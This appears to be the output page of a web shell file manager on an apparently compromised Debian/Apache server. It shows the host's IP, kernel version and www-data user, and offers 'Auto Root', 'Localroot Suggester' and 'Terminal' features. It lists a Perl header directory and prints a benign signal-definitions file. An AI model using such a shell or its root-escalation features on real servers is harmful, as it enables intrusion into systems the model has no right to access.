Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
x86_64-linux-gnu /
perl /
5.24.1 /
bits /
Delete
Unzip
Name
Size
Permission
Date
Action
byteswap-16.ph
730
B
-rwxrwxrwx
2020-06-20 19:33
byteswap.ph
3.72
KB
-rwxrwxrwx
2020-06-20 19:33
endian.ph
247
B
-rwxrwxrwx
2020-06-20 19:33
ioctl-types.ph
1.72
KB
-rwxrwxrwx
2020-06-20 19:33
ioctls.ph
3.74
KB
-rwxrwxrwx
2020-06-20 19:33
pthreadtypes.ph
4.31
KB
-rwxrwxrwx
2020-06-20 19:33
select.ph
1.36
KB
-rwxrwxrwx
2020-06-20 19:33
select2.ph
490
B
-rwxrwxrwx
2020-06-20 19:33
sigaction.ph
1.48
KB
-rwxrwxrwx
2020-06-20 19:33
sigcontext.ph
860
B
-rwxrwxrwx
2020-06-20 19:33
siginfo.ph
7.33
KB
-rwxrwxrwx
2020-06-20 19:33
signum.ph
2.76
KB
-rwxrwxrwx
2020-06-20 19:33
sigset.ph
2.99
KB
-rwxrwxrwx
2020-06-20 19:33
sigstack.ph
408
B
-rwxrwxrwx
2020-06-20 19:33
sigthread.ph
346
B
-rwxrwxrwx
2020-06-20 19:33
sockaddr.ph
507
B
-rwxrwxrwx
2020-06-20 19:33
socket.ph
13.33
KB
-rwxrwxrwx
2020-06-20 19:33
socket2.ph
177
B
-rwxrwxrwx
2020-06-20 19:33
socket_type.ph
766
B
-rwxrwxrwx
2020-06-20 19:33
syscall.ph
84.02
KB
-rwxrwxrwx
2020-06-20 19:33
syslog-ldbl.ph
355
B
-rwxrwxrwx
2020-06-20 19:33
syslog-path.ph
363
B
-rwxrwxrwx
2020-06-20 19:33
syslog.ph
404
B
-rwxrwxrwx
2020-06-20 19:33
time.ph
1.77
KB
-rwxrwxrwx
2020-06-20 19:33
timex.ph
3.1
KB
-rwxrwxrwx
2020-06-20 19:33
types.ph
2.42
KB
-rwxrwxrwx
2020-06-20 19:33
typesizes.ph
3.93
KB
-rwxrwxrwx
2020-06-20 19:33
uio.ph
581
B
-rwxrwxrwx
2020-06-20 19:33
waitflags.ph
1.15
KB
-rwxrwxrwx
2020-06-20 19:33
waitstatus.ph
1.54
KB
-rwxrwxrwx
2020-06-20 19:33
wordsize.ph
457
B
-rwxrwxrwx
2020-06-20 19:33
Save
Rename
require '_h2ph_pre.ph'; no warnings qw(redefine misc); if(defined(&_SIGNAL_H)) { eval 'sub SIG_ERR () {(( &__sighandler_t) -1);}' unless defined(&SIG_ERR); eval 'sub SIG_DFL () {(( &__sighandler_t) 0);}' unless defined(&SIG_DFL); eval 'sub SIG_IGN () {(( &__sighandler_t) 1);}' unless defined(&SIG_IGN); if(defined(&__USE_UNIX98)) { eval 'sub SIG_HOLD () {(( &__sighandler_t) 2);}' unless defined(&SIG_HOLD); } eval 'sub SIGHUP () {1;}' unless defined(&SIGHUP); eval 'sub SIGINT () {2;}' unless defined(&SIGINT); eval 'sub SIGQUIT () {3;}' unless defined(&SIGQUIT); eval 'sub SIGILL () {4;}' unless defined(&SIGILL); eval 'sub SIGTRAP () {5;}' unless defined(&SIGTRAP); eval 'sub SIGABRT () {6;}' unless defined(&SIGABRT); eval 'sub SIGIOT () {6;}' unless defined(&SIGIOT); eval 'sub SIGBUS () {7;}' unless defined(&SIGBUS); eval 'sub SIGFPE () {8;}' unless defined(&SIGFPE); eval 'sub SIGKILL () {9;}' unless defined(&SIGKILL); eval 'sub SIGUSR1 () {10;}' unless defined(&SIGUSR1); eval 'sub SIGSEGV () {11;}' unless defined(&SIGSEGV); eval 'sub SIGUSR2 () {12;}' unless defined(&SIGUSR2); eval 'sub SIGPIPE () {13;}' unless defined(&SIGPIPE); eval 'sub SIGALRM () {14;}' unless defined(&SIGALRM); eval 'sub SIGTERM () {15;}' unless defined(&SIGTERM); eval 'sub SIGSTKFLT () {16;}' unless defined(&SIGSTKFLT); eval 'sub SIGCLD () { &SIGCHLD;}' unless defined(&SIGCLD); eval 'sub SIGCHLD () {17;}' unless defined(&SIGCHLD); eval 'sub SIGCONT () {18;}' unless defined(&SIGCONT); eval 'sub SIGSTOP () {19;}' unless defined(&SIGSTOP); eval 'sub SIGTSTP () {20;}' unless defined(&SIGTSTP); eval 'sub SIGTTIN () {21;}' unless defined(&SIGTTIN); eval 'sub SIGTTOU () {22;}' unless defined(&SIGTTOU); eval 'sub SIGURG () {23;}' unless defined(&SIGURG); eval 'sub SIGXCPU () {24;}' unless defined(&SIGXCPU); eval 'sub SIGXFSZ () {25;}' unless defined(&SIGXFSZ); eval 'sub SIGVTALRM () {26;}' unless defined(&SIGVTALRM); eval 'sub SIGPROF () {27;}' unless defined(&SIGPROF); eval 'sub SIGWINCH () {28;}' unless defined(&SIGWINCH); eval 'sub SIGPOLL () { &SIGIO;}' unless defined(&SIGPOLL); eval 'sub SIGIO () {29;}' unless defined(&SIGIO); eval 'sub SIGPWR () {30;}' unless defined(&SIGPWR); eval 'sub SIGSYS () {31;}' unless defined(&SIGSYS); eval 'sub SIGUNUSED () {31;}' unless defined(&SIGUNUSED); eval 'sub _NSIG () {65;}' unless defined(&_NSIG); eval 'sub SIGRTMIN () {( &__libc_current_sigrtmin ());}' unless defined(&SIGRTMIN); eval 'sub SIGRTMAX () {( &__libc_current_sigrtmax ());}' unless defined(&SIGRTMAX); eval 'sub __SIGRTMIN () {32;}' unless defined(&__SIGRTMIN); eval 'sub __SIGRTMAX () {( &_NSIG - 1);}' unless defined(&__SIGRTMAX); } 1;